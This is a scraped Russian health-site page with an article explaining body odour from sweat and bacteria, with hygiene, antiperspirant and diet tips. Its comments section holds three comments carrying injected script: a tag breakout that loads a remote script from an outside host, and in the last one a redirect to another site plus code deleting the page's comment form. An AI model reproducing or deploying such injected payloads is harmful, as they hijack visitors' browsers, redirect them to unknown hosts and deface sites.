Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Почему от меня воняет? Ка...  >>  Почему от меня воняет? Как это победить
 
Обратная связь
 

Почему от меня воняет? Как это победить

Размер шрифта
12 июня 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Каждый из нас сталкивался с этим явлением. После тяжелой физической работы или занятий спортом (особенно в жару), наше тело начинает источать неприятный аромат. С чем это связано и как побороть?

Люди начинают интенсивно потеть (источая дурной запах) в подростковом возрасте, когда в крови повышается уровень половых гормонов – андрогенов. Для детей этот феномен не характерен.

Процесс потоотделения необходим организму для регуляции температуры тела. Сам по себе пот не имеет запаха, но является питательным субстратом для микробов, которые и становятся причиной отвратительного аромата. Звучит жутковато? Примите это как данность.

Почему потеют ноги

Бактерии особенно любят труднодоступные места, где им тепло и комфортно. К ним относятся складки тела (подмышки, промежность, перианальная область), половые органы и стопы. Тщательно мойте все эти места с мылом, чтобы избежать гнусного запаха. Помните, что ноги могут пахнуть из-за специфического запаха обуви. Это можно исправить с помощью обувных дезодорантов, которые продаются в аптеках. Кроме того, старайтесь носить толстые носки из абсорбирующего материала.

Как бороться с неприятным запахом

  • Конечно, первое и самое главное в борьбе с неприятным запахом – тщательная гигиена всего тела. Мойтесь чаще!
  • «Дезодорант» и «антиперсперант» – это не одно и то же. Дезодоранты лишь маскируют неприятный запах, а антиперсперанты воздействуют напрямую на потовые железы, снижая интенсивность потоотделения. Поэтому пользуйтесь именно антиперсперантами – перед сном и утром, после душа.
  • Держите подмышки сухими. Бактерии размножаются там, где тепло и влажно. Сухость они не переносят.
  • Водный раствор перекиси водорода обладает противомикробными свойствами. Добавьте чайную ложку 3-процентного раствора перекиси в стакан воды, полученным раствором протирайте те участки тела, в которых повышено потоотделение.
  • Чаще стирайте свою рабочую одежду и спортивную форму.
  • Измените свою диету. Некоторые пахучие продукты (например, чеснок, лук, карри) могут выделяться через кожу, усугубляя неприятный запах.
  • Если вы страдаете от гипергидроза (чрезмерной потливости), обратитесь к врачу: это состояние может быть следствием некоторых заболеваний. Кроме того, существуют эффективные методики борьбы с ним (например, инъекции ботулотоксина).
  • Регулярное бритье подмышечных впадин уменьшает скопление пота и бактерий.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:14

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:14

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Отличается ли пот от мочи?   От меня воняет! Как избавиться от запахов   Нужно ли мазать подмышки дезодорантом или нас заставляет реклама?   Почему у вас воняют ноги? Как с этим бороться  

Слайдшоу

1
Как остаться сухой, и не вспотеть
От вас пахнет! Из-за этих 10 продуктов
Самые стыдные вопросы о красоте. Часть 2

Тесты

Есть ли у вас гормональные нарушения
Как облегчить менопаузу?
Средства личной гигиены
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.